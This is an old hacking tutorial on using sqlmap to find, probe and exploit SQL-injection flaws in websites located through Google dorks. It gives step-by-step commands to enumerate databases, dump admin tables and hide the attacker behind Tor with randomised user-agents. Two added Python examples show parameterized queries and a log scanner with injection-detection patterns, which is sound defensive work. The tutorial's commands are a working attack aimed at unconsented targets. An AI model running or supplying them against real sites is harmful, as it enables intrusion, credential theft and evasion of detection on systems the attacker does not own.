
By Matrix (http://www.twitter.com/TheAnonMatrix)
Required for use: Backtrack 5 R1.

Start your Backtrack 5 R1 (BT5) and start sqlmap; it can be found in /pentest/database/sqlmap/. Now let's get started!

First we need a webpage. This is normally done by hand or by using dorks in Google. To find out if a page is vulnerable to an injection we do this:

    http://localhost.com/index.php?id=1337'

Notice the ' at the end. This should give you a pretty error and a good start!

Let's open sqlmap! The first thing you need to learn is the options, or settings, you have to apply in sqlmap. The base is:

    python sqlmap.py -u <website>

With a website we would simply do it like this:

    python sqlmap.py -u http://localhost/index.php?id=1337

(note we did not add the ' here). -u stands for URL and tells sqlmap THIS is our URL. But we have to add more options for sqlmap to work (note the following options use double dashes):

    --dbs    to find databases
    --users  to find users

    python sqlmap.py -u http://localhost/index.php?id=1337 --dbs

(and/or --users; for the sake of length we will be assuming you used --dbs in this tutorial.) After this command has run you should come up with 0 results, or some results. If you read the output you might be able to find some databases, and if you do, congratz! It should look like this:

    available databases [2]:
    [*] database1
    [*] database2

Now to the fun part!
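Why does the single quote produce that "pretty error"? Because the application splices the id parameter straight into its SQL text. The following Python script is an added example, not part of the original tutorial: it uses an in-memory SQLite table (a constructed stand-in for the tutorial's hypothetical index.php) to show the vulnerable pattern next to its parameterized fix. The concatenated query raises a syntax error on 1337', which is exactly the fingerprint the test above relies on, while the bound parameter leaves the statement unchanged and simply matches nothing.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the tutorial's target site."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [(1337, "home"), (1338, "about")])
    return conn


def lookup_concat(conn, user_id):
    """Vulnerable pattern: the request parameter becomes part of the SQL text."""
    sql = "SELECT title FROM pages WHERE id = " + user_id
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, user_id):
    """Hardened pattern: the SQL text is fixed; the value is bound separately."""
    sql = "SELECT title FROM pages WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (user_id,))]


def probe(user_id):
    """Run both lookups on the same input and report what each one does."""
    conn = make_db()
    result = {}
    try:
        result["concat"] = lookup_concat(conn, user_id)
    except sqlite3.OperationalError as exc:
        # This database error is the signal the tutorial's ?id=1337' test looks for.
        result["concat"] = "error: " + str(exc)
    # A bound parameter never changes the statement, so no syntax error is
    # possible; a malformed id just matches no row.
    result["param"] = lookup_param(conn, user_id)
    return result


if __name__ == "__main__":
    for value in ("1337", "1337'"):
        print(repr(value), probe(value))
```

The defensive takeaway is the second function: with a bound parameter the application never reveals whether the input reached the database, so the probe has nothing to read.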

    python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1

This tells the program to find tables (--tables) in the database (-D) named database1. Once you execute this you will (maybe) find tons of tables. Locate the one you want... let's call it admin!

    python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin

Now you should see the info of the table admin. But now we should be able to dump it! This can be done by --dump or --dump-all. Examples:

    python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1 --dump-all
    python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump

--dump dumps the selected table's content, --dump-all dumps EVERYTHING!

But, we should be secure? Tor with sqlmap:

First find /etc/apt/sources.list, open it and add:

    deb http://deb.torproject.org/torproject.org lucid main

Open the terminal and use these commands:

    gpg --keyserver keys.gnupg.net --recv 886DDD89
    gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

And now we need more commands run as root:

    apt-get update
    apt-get install tor tor-geoipdb
    apt-get install polipo

Start tor:

    /etc/init.d/tor start

Grab a copy of this config file: https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/buildscripts/config/polipo.conf

Go to /etc/polipo/config and replace the file with the one above. Restart polipo:

    /etc/init.d/polipo restart

Congratz! Now you can run sqlmap with Tor (the option is --tor, with double dashes like the others):

    python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump --tor --random-agent

Happy safe hacking!
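Seen from the server side, the whole procedure above leaves traces in the web access log: the quote probe that triggers a 500, the tool's default user-agent, and SQL keywords inside a parameter that should only ever hold a number. The script below is an added example, not part of the original tutorial; it parses a constructed combined-format log (documentation-range addresses and an illustrative sqlmap user-agent string, not real traffic) and aggregates the indicators per source address.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in combined log format; addresses are documentation ranges,
# not real traffic. The sqlmap user-agent string is illustrative only.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Apr/2011:10:00:01 +0000] "GET /index.php?id=1337 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Apr/2011:10:00:05 +0000] "GET /index.php?id=1337' HTTP/1.1" 500 221 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Apr/2011:10:00:06 +0000] "GET /index.php?id=1337 HTTP/1.1" 200 512 "-" "sqlmap/1.0 (http://sqlmap.org)"
203.0.113.9 - - [24/Apr/2011:10:00:07 +0000] "GET /index.php?id=1337%20UNION%20SELECT%20NULL HTTP/1.1" 200 498 "-" "Mozilla/5.0 (Windows NT 6.1)"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Value-level indicators: quote characters, comment sequences and SQL keywords
# that have no business inside a numeric id parameter.
SQLI_VALUE = re.compile(r"""['"]|--|/\*|\b(union|select|sleep|benchmark)\b""", re.I)


def parse_line(line):
    """Split one combined-format line into fields and decode the query string."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["params"] = parse_qsl(urlsplit(rec["target"]).query, keep_blank_values=True)
    return rec


def flags_for(rec):
    """Return the reasons a single request looks like injection probing."""
    reasons = []
    if "sqlmap" in rec["ua"].lower():
        reasons.append("sqlmap user-agent")
    for name, value in rec["params"]:
        if SQLI_VALUE.search(value):
            reasons.append(f"sqli pattern in {name}")
            break
    if rec["status"] == "500" and reasons:
        # A server error on a suspicious request is the tutorial's ?id=1337'
        # signal, seen from the other side.
        reasons.append("server error on suspicious request")
    return reasons


def analyse(log_text):
    """Aggregate per source address: total requests, flagged requests, reasons."""
    by_ip = defaultdict(lambda: {"requests": 0, "flagged": 0, "reasons": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        entry = by_ip[rec["ip"]]
        entry["requests"] += 1
        reasons = flags_for(rec)
        if reasons:
            entry["flagged"] += 1
            for reason in reasons:
                if reason not in entry["reasons"]:
                    entry["reasons"].append(reason)
    return dict(by_ip)


if __name__ == "__main__":
    for ip, entry in analyse(SAMPLE_LOG).items():
        print(ip, entry)
```

The tutorial's final command uses --random-agent, so the user-agent check alone is weak; the parameter-content and error-status signals carry the weight. Likewise a client behind Tor changes exit addresses, so the per-address aggregation is a triage aid, not a blocklist. The durable fix is the parameterized query, not the log rule.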

Sources:
http://www.coresec.org/2011/04/24/sqlmap-with-tor/
https://www.torproject.org/docs/debian.html.en#ubuntu
